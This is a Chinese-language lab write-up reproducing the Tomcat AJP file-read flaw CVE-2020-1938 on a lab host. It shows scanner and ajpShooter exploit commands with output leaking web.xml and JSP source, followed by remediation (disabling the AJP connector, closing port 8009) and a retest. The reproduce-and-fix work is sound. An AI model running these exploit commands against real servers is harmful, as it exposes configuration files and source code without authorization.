Tomcat-Ajp协议文件读取漏洞(CVE-2020-1938)
简介:利用此漏洞,可以获取和执行站点下任意文件,例如/WEB-INF/web.xml
工具:CVE-2020-1938TomcatAjpScanner.py、tomcat环境、web站点
1、漏洞复现:
python3 CVE-2020-1938TomcatAjpScanner.py 192.168.93.146
'192.168.93.146'] /woaiqiukui 开始检测第1个ip Getting resource at ajp13://192.168.93.146:8009/woaiqiukuitest ---------------------------- [+] ip:192.168.93.146存在tomcat AJP漏洞 [+] start reading WEB_INF/web.xml: [b'<?xml version="1.0" encoding="UTF-8"?>\r\n<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/javaee" xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd" id="WebApp_ID" version="2.5">\r\n <filter>\r\n <filter-name>EncodingFilter</filter-name>\r\n <filter-class>msl.web.filter.EncodingFilter</filter-class>\r\n </filter>\r\n <filter-mapping>\r\n <filter-name>EncodingFilter</filter-name>\r\n <url-pattern>/*</url-pattern>\r\n </filter-mapping>\r\n <servlet>\r\n <description></description>\r\n <display-name>BaseServlet</display-name>\r\n <servlet-name>BaseServlet</servlet-name>\r\n <servlet-class>msl.web.servlet.BaseServlet</servlet-class>\r\n </servlet>\r\n <servlet-mapping>\r\n <servlet-name>BaseServlet</servlet-name>\r\n <url-pattern>/base</url-pattern>\r\n </servlet-mapping>\r\n <error-page>\r\n <error-code>500</error-code>\r\n <location>/500.jsp</location>\r\n </error-page>\r\n <error-page>\r\n <error-code>404</error-code>\r\n <location>/404.html</location>\r\n </error-page>\r\n <error-page>\r\n \t<error-code>400</error-code>\r\n \t<location>/400.jsp</location
root@kali:~/Desktop/poc/CVE-2020-1938TomcatAjpScanner-master# python3 ajpShooter.py http://192.168.93.146:8080/ 8009 /jsp/index.jsp read _ _ __ _ _ /_\ (_)_ __ / _\ |__ ___ ___ | |_ ___ _ __ //_\\ | | '_ \ \ \| '_ \ / _ \ / _ \| __/ _ \ '__| / _ \| | |_) | _\ \ | | | (_) | (_) | || __/ | \_/ \_// | .__/ \__/_| |_|\___/ \___/ \__\___|_| |__/|_| 00theway,just for test [<] 200 OK [<] Set-Cookie: JSESSIONID=240A76CB98811D9E670C32AC3637636A; Path=/; HttpOnly [<] Accept-Ranges: bytes [<] ETag: W/"6815-1584381598000" [<] Last-Modified: Mon, 16 Mar 2020 17:59:58 GMT [<] Content-Type: text/html;charset=utf-8 [<] Content-Length: 6815 <%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %> <%@ taglib prefix="fn" uri="http://java.sun.com/jsp/jstl/functions" %> <!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>WEB01</title> <link rel="stylesheet" href="${pageContext.request.contextPath}/css/bootstrap.min.css" type="text/css" /> <script src="${pageContext.request.contextPath}/js/jquery-1.11.3.min.js" type="text/javascript"></script> <script src="${pageContext.request.contextPath}/js/bootstrap.min.js" type="text/javascript"></script> </head> <body> <div class="container-fluid"> <!-- 静态包含 --> <%@include file="/jsp/head.jsp" %>
默认情况下,tomcat的serverl.xml对ajp的开放状态,如果此时你的防火墙也开放了对应的8009端口,就可以被攻击者利用此漏洞
<!-- Define an AJP 1.3 Connector on port 8009 --> <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
2、修复建议
将上述server.xml中AJP配置注释掉,重启tomcat,或者防火墙关闭对应的8009端口。
<!-- Define an AJP 1.3 Connector on port 8009 --> <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->
复测发现已经修复
root@kali:~/Desktop/poc/CVE-2020-1938TomcatAjpScanner-master# python3 CVE-2020-1938TomcatAjpScanner.py 192.168.93.146 ['192.168.93.146'] /woaiqiukui 开始检测第1个ip [Errno 111] Connection refused Getting resource at ajp13://192.168.93.146:8009/woaiqiukuitest [-] 测试ip:192.168.93.146/woaiqiukuitest,[Errno 32] Broken pipe无法连接,原因可能为AJP协议支持端口已关闭 [Errno 32] Broken pipe
防火墙配置,删除/etc/sysconfig/iptables的8009端口配置,然后service iptables restart重启防火墙
-A INPUT -p tcp -m tcp --dport 8009 -j ACCEPT